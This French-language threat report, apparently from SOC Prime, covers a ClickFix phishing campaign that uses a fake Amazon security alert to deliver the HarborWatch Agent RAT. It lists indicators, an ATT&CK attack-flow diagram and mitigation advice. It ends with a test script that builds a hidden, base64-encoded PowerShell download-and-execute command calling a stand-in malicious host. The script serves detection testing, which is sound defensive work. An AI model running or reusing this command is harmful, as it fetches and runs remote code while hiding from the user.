D’une fausse alerte de sécurité Amazon à la livraison de l’agent HarborWatch

SOC Prime Team

Suivre

D’une fausse alerte de sécurité Amazon à la livraison de l’agent HarborWatch

Detection stack

AIDR
Alert
ETL
Query

Rapport
Flux d'Attaque
Détections
Simulations

Résumé

Le rapport détaille une campagne de phishing construite autour d’une fausse alerte de sécurité d’Amazon qui trompe les victimes en les incitant à exécuter une commande PowerShell via une invite de type ClickFix. Cette commande télécharge un exécutable malveillant nommé mysql.exe, qui est en fait le RAT HarborWatch Agent. Une fois lancé, le malware se connecte à un serveur de commande et contrôle et transmet les informations de l’hôte. L’opération repose sur des domaines similaires et une méthode d’auto-infection pilotée par l’utilisateur pour éviter la détection traditionnelle basée sur les pièces jointes.

Investigation

Cofense a retracé la campagne depuis l’adresse d’expéditeur usurpée à travers les domaines malveillants, le téléchargeur PowerShell et la charge finale du malware. L’analyse dynamique de mysql.exe a révélé une communication sortante avec un serveur de commande et contrôle à 185.193.127.44 et l’utilisation des chemins API /api/agent/tasks/ and /api/heartbeat. L’analyse de la mémoire a également exposé l’identifiant HarborWatchAgent/c-1.1.1.

Atténuation

Les organisations devraient bloquer les domaines et adresses IP malveillants identifiés, restreindre l’exécution des commandes PowerShell encodées, surveiller la création inattendue de mysql.exe dans le répertoire Temp , et renforcer les défenses de messagerie contre l’usurpation d’identité de marque et les alertes usurpées.

Réponse

Si cette activité est détectée, isolez le point de terminaison affecté, terminez le processus de l’agent HarborWatch, collectez des preuves médico-légales, et déployez des blocages basés sur des indicateurs à travers l’environnement. Les utilisateurs devraient également être avertis de la fausse alerte de sécurité d’Amazon, et les protections contre le phishing devraient être mises à jour pour détecter des appâts similaires.

"graph TB %% Class definitions classDef action fill:#99ccff classDef malware fill:#ff6666 classDef process fill:#ffcc99 classDef file fill:#cccccc %% Nodes initial_access_phishing["Action – T1566.002 Spearphishing Link Un e-mail semble provenir d’Amazon et contient un lien de vérification malveillant."] class initial_access_phishing action user_execution_malicious_link["Action – T1204.001 User Execution: Malicious Link La victime clique sur le lien et est dirigée vers une page qui lui demande de copier-coller une commande PowerShell."] class user_execution_malicious_link action user_execution_copy_paste["Action – T1204.004 User Execution: Copy and Paste La commande PowerShell copiée est exécutée localement."] class user_execution_copy_paste action obfuscation_obfuscated_files["Action – T1027 Obfuscated Files or Information & T1027.018 Invisible Unicode La commande PowerShell est codée en base64 et contient des caractères Unicode cachés."] class obfuscation_obfuscated_files action deobfuscate_decode["Action – T1140 Deobfuscate/Decode Files or Information La commande décode la charge utile à l’exécution."] class deobfuscate_decode action hide_artifact_hidden_window["Action – T1564.003 Hidden Window La commande PowerShell s’exécute avec l’option -w hidden pour éviter l’affichage de l’interface utilisateur."] class hide_artifact_hidden_window action ingress_tool_transfer["Action – T1105 Ingress Tool Transfer Le script télécharge un script PowerShell de second étage (code.txt) à partir d’un serveur distant."] class ingress_tool_transfer action server_software_component["Action – T1505 Server Software Component Le second script récupère et exécute une charge utile (mysql.exe) placée dans %TEMP%."] class server_software_component action remote_access_tool["Malware – T1219 Remote Access Tool Un RAT personnalisé nommé HarborWatch Agent est exécuté."] class remote_access_tool malware discovery_security_software["Action – T1518.001 Security Software Discovery Le RAT collecte des informations sur les logiciels de sécurité."] class discovery_security_software action discovery_hardware["Action – T1592.001 Hardware Discovery Le RAT récupère les détails matériels de l’hôte."] class discovery_hardware action discovery_network_appliances["Action – T1590.006 Network Security Appliances Le RAT énumère les appareils de sécurité réseau."] class discovery_network_appliances action discovery_log_enumeration["Action – T1654 Log Enumeration Le RAT énumère les journaux d’événements."] class discovery_log_enumeration action discovery_threat_vendor["Action – T1681 Search Threat Vendor Data Le RAT recherche des renseignements sur les menaces."] class discovery_threat_vendor action c2_bidirectional["Action – T1102.002 Web Service Bidirectional Communication Les données sont envoyées au serveur C2 via HTTPS."] class c2_bidirectional action c2_oneway["Action – T1102.003 Web Service Oneu2011Way Communication Instructions supplémentaires récupérées via HTTPS."] class c2_oneway action c2_dynamic_resolution["Action – T1568 Dynamic Resolution Le RAT résout les domaines C2 à l’exécution."] class c2_dynamic_resolution action c2_dga["Action – T1568.002 Domain Generation Algorithms Liste de domaines générée automatiquement."] class c2_dga action c2_dead_drop_resolver["Action – T1102.001 Dead Drop Resolver Récupère des instructions C2 supplémentaires depuis un site de dead drop."] class c2_dead_drop_resolver action exfiltration_c2["Action – T1041 Exfiltration Over C2 Channel Les informations collectées sont exfiltrées par le même canal web."] class exfiltration_c2 action exfiltration_alternative["Action – T1048 Exfiltration Over Alternative Protocol Protocole alternatif utilisé pour l’exfiltration des données."] class exfiltration_alternative action discovery_cloud_dashboard["Action – T1538 Cloud Service Dashboard Données affichées sur un panneau web en langue chinoise (Harbor Sentinel)."] class discovery_cloud_dashboard action %% Connections initial_access_phishing –>|leads to| user_execution_malicious_link user_execution_malicious_link –>|leads to| user_execution_copy_paste user_execution_copy_paste –>|triggers| obfuscation_obfuscated_files obfuscation_obfuscated_files –>|decoded by| deobfuscate_decode deobfuscate_decode –>|executes| hide_artifact_hidden_window hide_artifact_hidden_window –>|downloads| ingress_tool_transfer ingress_tool_transfer –>|downloads| server_software_component server_software_component –>|executes| remote_access_tool remote_access_tool –>|performs| discovery_security_software remote_access_tool –>|performs| discovery_hardware remote_access_tool –>|performs| discovery_network_appliances remote_access_tool –>|performs| discovery_log_enumeration remote_access_tool –>|performs| discovery_threat_vendor remote_access_tool –>|communicates via| c2_bidirectional remote_access_tool –>|receives via| c2_oneway c2_bidirectional –>|uses| c2_dynamic_resolution c2_dynamic_resolution –>|uses| c2_dga c2_oneway –>|uses| c2_dead_drop_resolver remote_access_tool –>|exfiltrates via| exfiltration_c2 exfiltration_c2 –>|may also use| exfiltration_alternative remote_access_tool –>|reports to| discovery_cloud_dashboard "

Flux d’Attaque

Récit & Commandes d’Attaque :
Un attaquant a obtenu un point d’entrée sur le terminal et souhaite télécharger et exécuter une charge utile malveillante tout en restant caché de l’utilisateur. Il créé une commande PowerShell en une ligne qui :
1. Exécute sans profil (-nop) pour éviter de charger les profils utilisateur.
2. Démarre dans une fenêtre cachée (-w hidden) pour éviter l’exposition de l’interface utilisateur (T1564.003).
3. Incorpore un script de reverse shell codé en base64 pour échapper à la détection de chaînes simples (T1027.010).
4. Exécute le script décodé via -EncodedCommand, utilisant PowerShell comme un binaire signé (T1218).
La ligne de commande élaborée correspond aux filtres CommandLine|contains de la règle Sigma, générant ainsi l’alerte attendue.

Script de Test de Régression :

# -------------------------------------------------
# Exécution PowerShell malveillante qui devrait déclencher la règle Sigma
# -------------------------------------------------
$payload = 'IEX (New-Object Net.WebClient).DownloadString("http://malicious.example.com/payload.ps1")'
$b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
$cmd = "-nop -w hidden -EncodedCommand $b64"
Start-Process -FilePath "$env:SystemRootSystem32WindowsPowerShellv1.0powershell.exe" `
    -ArgumentList $cmd `
    -WindowStyle Hidden
# Fin du script

Commandes de Nettoyage :

# Terminer tous les processus PowerShell malveillants restants
Get-Process -Name powershell -ErrorAction SilentlyContinue | Stop-Process -Force

# Supprimer tous les fichiers temporaires (aucun créé dans ce cas)
# Supprimer la variable de charge utile base64 de la session (optionnel)
Remove-Variable -Name b64 -ErrorAction SilentlyContinue

Rejoignez la plateforme Detection as Code de SOC Prime pour améliorer la visibilité sur les menaces les plus pertinentes pour votre entreprise. Pour vous aider à démarrer et à générer une valeur immédiate, planifiez dès maintenant une réunion avec des experts de SOC Prime.

Rejoindre gratuitement